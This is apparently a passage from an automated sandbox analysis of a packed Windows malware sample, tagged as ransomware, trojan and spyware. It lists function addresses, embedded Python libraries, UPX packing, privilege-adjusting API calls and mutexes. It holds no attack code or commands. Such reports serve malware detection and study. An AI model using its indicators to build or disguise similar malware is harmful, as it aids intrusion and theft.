              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00560F1_2_00007FFDFB00560F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB005F101_2_00007FFDFB005F10
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB002D741_2_00007FFDFB002D74
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB006D5C1_2_00007FFDFB006D5C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1B4BC01_2_00007FFDFB1B4BC0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB002FCC1_2_00007FFDFB002FCC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB004C141_2_00007FFDFB004C14
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB004B561_2_00007FFDFB004B56
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0011CC1_2_00007FFDFB0011CC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00275C1_2_00007FFDFB00275C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB004A531_2_00007FFDFB004A53
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0022AC1_2_00007FFDFB0022AC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00177B1_2_00007FFDFB00177B
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0065A01_2_00007FFDFB0065A0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB006EBF1_2_00007FFDFB006EBF
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0044031_2_00007FFDFB004403
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00362F1_2_00007FFDFB00362F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00592F1_2_00007FFDFB00592F
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0012171_2_00007FFDFB001217
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0011401_2_00007FFDFB001140
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0010AA1_2_00007FFDFB0010AA
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0022FC1_2_00007FFDFB0022FC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0026E91_2_00007FFDFB0026E9
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0014241_2_00007FFDFB001424
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB002E8C1_2_00007FFDFB002E8C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1403001_2_00007FFDFB140300
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB004C371_2_00007FFDFB004C37
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0041011_2_00007FFDFB004101
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB005B731_2_00007FFDFB005B73
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB006C211_2_00007FFDFB006C21
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB12C7D01_2_00007FFDFB12C7D0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0025EF1_2_00007FFDFB0025EF
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0069E71_2_00007FFDFB0069E7
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0B07501_2_00007FFDFB0B0750
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB002C751_2_00007FFDFB002C75
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB01C6201_2_00007FFDFB01C620
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB1B84901_2_00007FFDFB1B8490
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB01C4801_2_00007FFDFB01C480
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB38B3701_2_00007FFDFB38B370
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB3E7B901_2_00007FFDFB3E7B90
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB3CFC001_2_00007FFDFB3CFC00
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB38F8B51_2_00007FFDFB38F8B5
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB3814511_2_00007FFDFB381451
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB381DCF1_2_00007FFDFB381DCF
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB3819561_2_00007FFDFB381956
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9AEE30276_2_00007FFD9AEE3027
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B27B2465_2_00007FF629B27B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B00A2C65_2_00007FF629B00A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFABA065_2_00007FF629AFABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1AE1065_2_00007FF629B1AE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AF82F065_2_00007FF629AF82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0118065_2_00007FF629B01180
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B054C065_2_00007FF629B054C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFB54065_2_00007FF629AFB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AF188465_2_00007FF629AF1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B5AAC065_2_00007FF629B5AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFCB1465_2_00007FF629AFCB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2FA6C65_2_00007FF629B2FA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B35A7065_2_00007FF629B35A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B369FD65_2_00007FF629B369FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AF49B865_2_00007FF629AF49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1D97C65_2_00007FF629B1D97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B46D0C65_2_00007FF629B46D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B19D0C65_2_00007FF629B19D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B20D2065_2_00007FF629B20D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFDD0465_2_00007FF629AFDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B35C8C65_2_00007FF629B35C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B08C3065_2_00007FF629B08C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B49B9865_2_00007FF629B49B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B34B3865_2_00007FF629B34B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2AF0C65_2_00007FF629B2AF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AF9EFC65_2_00007FF629AF9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3EEA465_2_00007FF629B3EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3AE5065_2_00007FF629B3AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFCE8465_2_00007FF629AFCE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B08E6865_2_00007FF629B08E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4FE7465_2_00007FF629B4FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B41DCC65_2_00007FF629B41DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFEE0865_2_00007FF629AFEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B01E0465_2_00007FF629B01E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B39D7465_2_00007FF629B39D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1010465_2_00007FF629B10104
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B500F065_2_00007FF629B500F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2804065_2_00007FF629B28040
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1C05C65_2_00007FF629B1C05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2007465_2_00007FF629B20074
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2C00C65_2_00007FF629B2C00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0303065_2_00007FF629B03030
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B5DFD865_2_00007FF629B5DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B34FE865_2_00007FF629B34FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B5AF9065_2_00007FF629B5AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B25F4C65_2_00007FF629B25F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AF42E065_2_00007FF629AF42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4131465_2_00007FF629B41314
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4832C65_2_00007FF629B4832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0D2C065_2_00007FF629B0D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFF24C65_2_00007FF629AFF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B302A465_2_00007FF629B302A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1724465_2_00007FF629B17244
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4226865_2_00007FF629B42268
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0E21C65_2_00007FF629B0E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B541CC65_2_00007FF629B541CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B381CC65_2_00007FF629B381CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3216465_2_00007FF629B32164
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AFA50465_2_00007FF629AFA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1D45865_2_00007FF629B1D458
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3546865_2_00007FF629B35468
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1C3E065_2_00007FF629B1C3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0236065_2_00007FF629B02360
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2037465_2_00007FF629B20374
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3270065_2_00007FF629B32700
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2A71065_2_00007FF629B2A710
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3071065_2_00007FF629B30710
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B086C465_2_00007FF629B086C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B586D465_2_00007FF629B586D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4766065_2_00007FF629B47660
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B265FC65_2_00007FF629B265FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4260C65_2_00007FF629B4260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0859865_2_00007FF629B08598
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2F59C65_2_00007FF629B2F59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B1F5B065_2_00007FF629B1F5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2090465_2_00007FF629B20904
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3190C65_2_00007FF629B3190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B2D91C65_2_00007FF629B2D91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B238E865_2_00007FF629B238E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B418A865_2_00007FF629B418A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0289065_2_00007FF629B02890
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629AF888465_2_00007FF629AF8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B017C865_2_00007FF629B017C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B167E065_2_00007FF629B167E0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: String function: 00007FFDFB3ED74F appears 44 times
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: String function: 00007FFDFB002734 appears 511 times
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: String function: 00007FFDFB0024B9 appears 83 times
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: String function: 00007FFDFB001EF1 appears 1581 times
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: String function: 00007FFDFB00483B appears 128 times
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: String function: 00007FFDFB3812EE appears 131 times
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: String function: 00007FFDFB004057 appears 782 times
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: String function: 00007FFDFB002A04 appears 172 times
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: String function: 00007FFDFB00698D appears 49 times
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: String function: 00007FF6FB1E25F0 appears 100 times
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: String function: 00007FF6FB1E2760 appears 36 times
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: String function: 00007FFDFB004D68 appears 38 times
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: String function: 00007FFDFB00688E appears 31 times
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: String function: 00007FFDFB00300D appears 55 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: String function: 00007FF629B349F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: String function: 00007FF629B08444 appears 48 times
              Source: e45AiBoV6X.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: e45AiBoV6X.exeBinary or memory string: OriginalFilename vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000003.1716755215.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000003.1717360378.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000003.1717532806.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000003.1716650900.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTpmInit.EXEj% vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000003.1717278890.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000003.1720356944.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000003.1717046095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000003.1720685232.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000003.1717449095.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000003.1716520142.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000003.1717157218.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000003.1720465191.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000000.00000003.1716876417.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exeBinary or memory string: OriginalFilename vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1990196980.00007FFDFAFF7000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1995577152.00007FFE1026B000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1998105066.00007FFE130CC000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1996719038.00007FFE11EBD000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000000.1721262805.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTpmInit.EXEj% vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1997261664.00007FFE126D7000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1994792441.00007FFE0EC6D000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1997027781.00007FFE11EE3000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1994297554.00007FFDFF2FE000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1995081068.00007FFE101E4000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1993521575.00007FFDFB897000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython310.dll. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1992103361.00007FFDFB432000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibsslH vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1997553362.00007FFE126F7000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1996384225.00007FFE10318000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exe, 00000001.00000002.1997841241.00007FFE12E1C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs e45AiBoV6X.exe
              Source: e45AiBoV6X.exeBinary or memory string: OriginalFilenameTpmInit.EXEj% vs e45AiBoV6X.exe
              Source: libcrypto-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.998771639088251
              Source: libssl-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9903694614553314
              Source: python310.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.99934387748315
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9978469358079526
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9943230597527473
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@135/52@2/2
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E29E0 GetLastError,FormatMessageW,MessageBoxW,0_2_00007FF6FB1E29E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,65_2_00007FF629B0EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B3B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,65_2_00007FF629B3B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B13144 GetDiskFreeSpaceExW,65_2_00007FF629B13144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:824:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2104:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4192:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeMutant created: \Sessions\1\BaseNamedObjects\3
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
